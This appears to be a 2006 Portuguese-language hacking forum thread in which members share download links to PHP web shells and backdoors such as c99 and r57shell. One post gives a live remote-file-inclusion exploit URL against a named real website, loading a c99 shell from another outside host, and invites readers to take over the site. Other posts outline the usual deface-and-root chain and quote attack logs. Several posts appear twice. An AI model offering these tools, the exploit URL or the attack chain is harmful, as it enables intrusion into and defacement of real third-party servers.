Title: Vários PHP WebShells
Post by: HadeS on 04 de June , 2006, 11:37:20 PM
Post by: HadeS on 04 de June , 2006, 11:37:20 PM
Defacing Tool Pro v2.5 public
http://www.anonym.to/?http://www.anthra ... ax/cmd.rar (http://www.anonym.to/?http://www.anthraxforum.com.ar/antrax/cmd.rar)
nsTview v2.1 :: 27.83 Kb PHP Shell
http://www.anonym.to/?http://nst.void.r ... download=6 (http://www.anonym.to/?http://nst.void.ru/?q=releases&download=6)
r57shell.php
http://www.anonym.to/?http://rst.void.r ... 7shell.txt (http://www.anonym.to/?http://rst.void.ru/download/r57shell.txt)
Shell c99
http://www.anonym.to/?http://rapidshare ... ar.gz.html (http://www.anonym.to/?http://rapidshare.de/files/13862179/c99last.tar.gz.html)
PHP BackDooR (fr)
http://www.megaupload.com/?d=302JJJGA (http://www.megaupload.com/?d=302JJJGA)
PHP BackDooR
http://www.megaupload.com/?d=7Z8AFXKW (http://www.megaupload.com/?d=7Z8AFXKW)
PHP Shell 1.7
http://www.megaupload.com/?d=6S0D9ASI (http://www.megaupload.com/?d=6S0D9ASI)
Simple PHP BackDooR
http://www.megaupload.com/?d=L62C2BQA (http://www.megaupload.com/?d=L62C2BQA)
Façam bom uso dessa lista.
HadeS
http://www.anonym.to/?http://www.anthra ... ax/cmd.rar (http://www.anonym.to/?http://www.anthraxforum.com.ar/antrax/cmd.rar)
nsTview v2.1 :: 27.83 Kb PHP Shell
http://www.anonym.to/?http://nst.void.r ... download=6 (http://www.anonym.to/?http://nst.void.ru/?q=releases&download=6)
r57shell.php
http://www.anonym.to/?http://rst.void.r ... 7shell.txt (http://www.anonym.to/?http://rst.void.ru/download/r57shell.txt)
Shell c99
http://www.anonym.to/?http://rapidshare ... ar.gz.html (http://www.anonym.to/?http://rapidshare.de/files/13862179/c99last.tar.gz.html)
PHP BackDooR (fr)
http://www.megaupload.com/?d=302JJJGA (http://www.megaupload.com/?d=302JJJGA)
PHP BackDooR
http://www.megaupload.com/?d=7Z8AFXKW (http://www.megaupload.com/?d=7Z8AFXKW)
PHP Shell 1.7
http://www.megaupload.com/?d=6S0D9ASI (http://www.megaupload.com/?d=6S0D9ASI)
Simple PHP BackDooR
http://www.megaupload.com/?d=L62C2BQA (http://www.megaupload.com/?d=L62C2BQA)
Façam bom uso dessa lista.
HadeS
Title: Re: Vários PHP WebShells
Post by: Shady on 05 de June , 2006, 01:39:24 PM
Post by: Shady on 05 de June , 2006, 01:39:24 PM
Fonte? 
Title: Re: Vários PHP WebShells
Post by: HadeS on 05 de June , 2006, 07:01:59 PM
Post by: HadeS on 05 de June , 2006, 07:01:59 PM
Hacking World.
Desculpe denovo. Mas foi tudo postado de uma vez só. Meus próximos posts terão fonte.
HadeS
Desculpe denovo. Mas foi tudo postado de uma vez só. Meus próximos posts terão fonte.
HadeS
Title: Re: Vários PHP WebShells
Post by: Anonymous on 11 de June , 2006, 03:23:28 PM
Post by: Anonymous on 11 de June , 2006, 03:23:28 PM
será q dave p vc dar uma explicada no q cada coisa faz.
é q indo to comçando...
é q indo to comçando...
Title: Re: Vários PHP WebShells
Post by: Wuefez on 12 de June , 2006, 04:15:28 AM
Post by: Wuefez on 12 de June , 2006, 04:15:28 AM
Quote from: "rapozza.anymalz"será q dave p vc dar uma explicada no q cada coisa faz.
é q indo to comçando...
Essas "shells php" tipo C99 são pras pessoas que não sabem colocar um backdoor de verdade na shell, e que também na maioria das vezes não sabem rootar, que acabam achando milhares de sites bugados mais que só ownam os sites que dão pra editar a index com o id do usuario do web server...
CSE na veia !!!
@rapozza.anymalz
A maioria das pessoas usa essas coisas como cmd, vou dar um exemplo real aqui vai um site bugado que eu achei hoje, com a técnica php injection (file inclusion):
http://www.freeklick.de/link.php?show= (http://www.freeklick.de/link.php?show=)
Ai você diz o que tem de errado nessa url ?
No caso temos um include chamado show na pagina link.php, a sintaxe esta certa mais permite a inclusão de arquivos remotos, ou seja você pode fazer o PHP do site processar o que você quiser...
Ficando:
http://www.freeklick.de/link.php?show=h ... br/C99.txt (http://www.freeklick.de/link.php?show=http://suportejuridico.adv.br/C99.txt)
Pode ownar esse site se quiser, mais ve se deixa um greetz pra mim, ok ?
Title: Re: Vários PHP WebShells
Post by: Anonymous on 12 de June , 2006, 05:26:16 PM
Post by: Anonymous on 12 de June , 2006, 05:26:16 PM
valeu pelo dica, esclareceu basatante coisa
mas o link que você me passou...
olha o que tinha lá:
furtivo was here!!!
########## Trap Version 1.5 ##########
Date: 26-02-2006 16:29:24
Attempt: http://geocities.yahoo.com.br/ivissonc/neocmd.txt (http://geocities.yahoo.com.br/ivissonc/neocmd.txt)?
Variable: show
IP: 201.1.39.168
Server: www.freeklick.de (http://www.freeklick.de)
########## Trap Version 1.5 ##########
Date: 04-03-2006 19:38:43
Attempt: uname -a;id
Variable: cmd
IP: unknown
Server: www.freeklick.de (http://www.freeklick.de)
########## Trap Version 1.5 ##########
Date: 04-03-2006 19:39:41
Attempt: uname -a;idhttp://www.sistemafloresta.com.br/home/modulos.php?link=
Variable: cmd
IP: unknown
Server: www.freeklick.de (http://www.freeklick.de)
e mais um monte.
o deface fica pra próxima.
mas o link que você me passou...
olha o que tinha lá:
furtivo was here!!!
########## Trap Version 1.5 ##########
Date: 26-02-2006 16:29:24
Attempt: http://geocities.yahoo.com.br/ivissonc/neocmd.txt (http://geocities.yahoo.com.br/ivissonc/neocmd.txt)?
Variable: show
IP: 201.1.39.168
Server: www.freeklick.de (http://www.freeklick.de)
########## Trap Version 1.5 ##########
Date: 04-03-2006 19:38:43
Attempt: uname -a;id
Variable: cmd
IP: unknown
Server: www.freeklick.de (http://www.freeklick.de)
########## Trap Version 1.5 ##########
Date: 04-03-2006 19:39:41
Attempt: uname -a;idhttp://www.sistemafloresta.com.br/home/modulos.php?link=
Variable: cmd
IP: unknown
Server: www.freeklick.de (http://www.freeklick.de)
e mais um monte.
o deface fica pra próxima.
Title: Re: Vários PHP WebShells
Post by: Anonymous on 12 de June , 2006, 05:31:08 PM
Post by: Anonymous on 12 de June , 2006, 05:31:08 PM
Shell c99
Essa, eu conheço, muito boa.
DeamoN.Cheat
Essa, eu conheço, muito boa.
DeamoN.Cheat
Title: Re: Vários PHP WebShells
Post by: Anonymous on 14 de June , 2006, 08:37:01 AM
Post by: Anonymous on 14 de June , 2006, 08:37:01 AM
O Certo seria chamar de apenas CMD não de Shell, pq vc nesta parte do ataque você ainda não está na shell, está apenas usando uma cmd para tentar mandar um backdoor, ou intaum fazer uma conecção reversa, para que depois tendo acesso a shell do site possa rota-la sem problemas
Title: Re: Vários PHP WebShells
Post by: HadeS on 14 de June , 2006, 02:41:36 PM
Post by: HadeS on 14 de June , 2006, 02:41:36 PM
¬¬'
O que é uma Shell para você? Uma tela preta com letrinhas brancas onde você digita comandos e magicamente coisas acontecem?
Errado!
Shell é alguma interface que gera uma interação entre o usuário e o Sistema Operacional, por meios de comandos. A "CMD" (Como quiser) não é isso? Ela não gera uma interação entre você e o Sistema Operacional (Mesmo que remotamente. Por isso o nome WebShell)? Então acho que CMD é um nome um tanto quanto "chulo", prefiro WebShells.
Puff.
HadeS
Observação... Sinceramente, esse tipo de "receitas de bolo", usado pela maioria dos defacers, é uma coisa um tanto quanto ridícula. O único modo de Ownar um servidor é assim? Primeiro bata uma "CMD" num Include bem fresquinho, aí depois dá uma pitada de Backdoor, fazendo sempre Conexão Reversa, depois leve ao forno e terá uma "Shell", e pra um final espatacular, arranje um exploit com algum amigo para pode conseguir direitos de super-usuário (root) no sistema ("Rootar").
O que é uma Shell para você? Uma tela preta com letrinhas brancas onde você digita comandos e magicamente coisas acontecem?
Errado!
Shell é alguma interface que gera uma interação entre o usuário e o Sistema Operacional, por meios de comandos. A "CMD" (Como quiser) não é isso? Ela não gera uma interação entre você e o Sistema Operacional (Mesmo que remotamente. Por isso o nome WebShell)? Então acho que CMD é um nome um tanto quanto "chulo", prefiro WebShells.
Puff.
HadeS
Observação... Sinceramente, esse tipo de "receitas de bolo", usado pela maioria dos defacers, é uma coisa um tanto quanto ridícula. O único modo de Ownar um servidor é assim? Primeiro bata uma "CMD" num Include bem fresquinho, aí depois dá uma pitada de Backdoor, fazendo sempre Conexão Reversa, depois leve ao forno e terá uma "Shell", e pra um final espatacular, arranje um exploit com algum amigo para pode conseguir direitos de super-usuário (root) no sistema ("Rootar").
Title: Re: Vários PHP WebShells
Post by: Anonymous on 14 de June , 2006, 11:26:20 PM
Post by: Anonymous on 14 de June , 2006, 11:26:20 PM
uiá qe hacker...
Copio o texto da onde ??
Copio o texto da onde ??
Title: Re: Vários PHP WebShells
Post by: HadeS on 15 de June , 2006, 01:27:48 PM
Post by: HadeS on 15 de June , 2006, 01:27:48 PM
Eu sou um tipo de pessoa que crio meus textos, como disse, não uso receitas feitas por outros.
E quando eu trago alguma coisa para cá de outros sites ponho a devida fonte.
HadeS
E quando eu trago alguma coisa para cá de outros sites ponho a devida fonte.
HadeS
Title: Re: Vários PHP WebShells
Post by: Anonymous on 15 de June , 2006, 06:07:56 PM
Post by: Anonymous on 15 de June , 2006, 06:07:56 PM
sei...
também crio varios texto...
mas vc naum terá ah chance de le-os...
os meus textos soh tinham no antigo darkers..
mais aew agora tem novo textos..
mas agora só crio textos que me rendam algo...
BYe e algum moderador fecha o topico....
também crio varios texto...
mas vc naum terá ah chance de le-os...
os meus textos soh tinham no antigo darkers..
mais aew agora tem novo textos..
mas agora só crio textos que me rendam algo...
BYe e algum moderador fecha o topico....
Title: Re: Vários PHP WebShells
Post by: whit3_sh4rk on 15 de June , 2006, 06:45:52 PM
Post by: whit3_sh4rk on 15 de June , 2006, 06:45:52 PM
[f4kelive]
Não entendi o seu objetivo com esses posts.. Foram desnecessários..
E também não vejo motivos para fecharem o tópico, afinal de contas quem quis começar algum flame ou coisa do tipo aqui foi você mesmo.
[]s
Não entendi o seu objetivo com esses posts.. Foram desnecessários..
E também não vejo motivos para fecharem o tópico, afinal de contas quem quis começar algum flame ou coisa do tipo aqui foi você mesmo.
[]s
Title: Re: Vários PHP WebShells
Post by: Shady on 15 de June , 2006, 08:08:32 PM
Post by: Shady on 15 de June , 2006, 08:08:32 PM
Sinceramente... Darkfire, como o ws disse, faca-me um favor... Quero posts uteis aqui, ou de incentivo, ou ensinando, nao esse tipo de critica infundada...